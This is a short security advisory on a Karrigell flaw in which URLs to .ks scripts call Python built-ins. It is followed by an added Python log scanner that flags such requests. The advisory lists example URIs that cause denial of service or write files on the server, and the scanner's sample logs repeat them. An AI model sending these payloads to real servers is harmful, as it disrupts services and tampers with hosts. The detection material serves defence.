Karrigell KS File Arbitrary Python Command Execution Vulnerability

An exploit is not required. Some example URIs have been provided.

The following examples will cause a denial-of-service condition:
http://www.example.com/test.ks/raw_input
http://www.example.com/test.ks/file?%22*10000000&mode=w

The following example will create a file on the local filesystem of the hosting computer:
http://www.example.com/test.ks/file?%22*2&mode=w
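
A log check for the request pattern in the URIs above, as an added example that is not part of the original advisory: it flags requests whose path names a Python built-in directly after a .ks script. The built-in list, the Common Log Format assumption and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

# Subset of Python 2 built-in names chosen for this example (raw_input and
# file, used in the advisory's URIs, are Python 2 built-ins). A function the
# .ks script defines under one of these names would be a false positive.
PY2_BUILTINS = frozenset("""
    raw_input input file open eval execfile compile reload __import__
    getattr setattr delattr globals locals vars dir help exit quit
    """.split())

# Common Log Format request field: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Script name ending in .ks followed by the called function name
KS_CALL_RE = re.compile(r'/[^/]+\.ks/(?P<func>[^/?#]+)', re.IGNORECASE)

def ks_builtin_call(target):
    """Return the built-in name requested via a .ks URL, or None."""
    path = unquote(urlsplit(target).path)  # decode %xx so encoding cannot hide the name
    m = KS_CALL_RE.search(path)
    if not m:
        return None
    func = m.group("func")
    return func if func in PY2_BUILTINS else None

def scan(log_lines):
    """Yield (line_number, builtin, target) for each suspicious request."""
    for n, line in enumerate(log_lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        hit = ks_builtin_call(m.group("target"))
        if hit:
            yield n, hit, m.group("target")

# Constructed sample log lines (not from a real server)
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] "GET /test.ks/index HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jan/2010:10:00:05 +0000] "GET /test.ks/raw_input HTTP/1.1" 500 0',
    '192.0.2.11 - - [01/Jan/2010:10:00:09 +0000] "GET /test.ks/file?%22*2&mode=w HTTP/1.1" 200 0',
    '192.0.2.12 - - [01/Jan/2010:10:00:12 +0000] "GET /test.ks/%72aw_input HTTP/1.1" 500 0',
    '192.0.2.13 - - [01/Jan/2010:10:00:20 +0000] "GET /docs/file HTTP/1.1" 200 90',
]

if __name__ == "__main__":
    for n, builtin, target in scan(SAMPLE_LOG):
        print("line %d: built-in %r requested via %s" % (n, builtin, target))
```

A hit is a lead for review rather than proof of compromise; compare the flagged name against the functions the script actually defines.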

Copyright 2010, SecurityFocus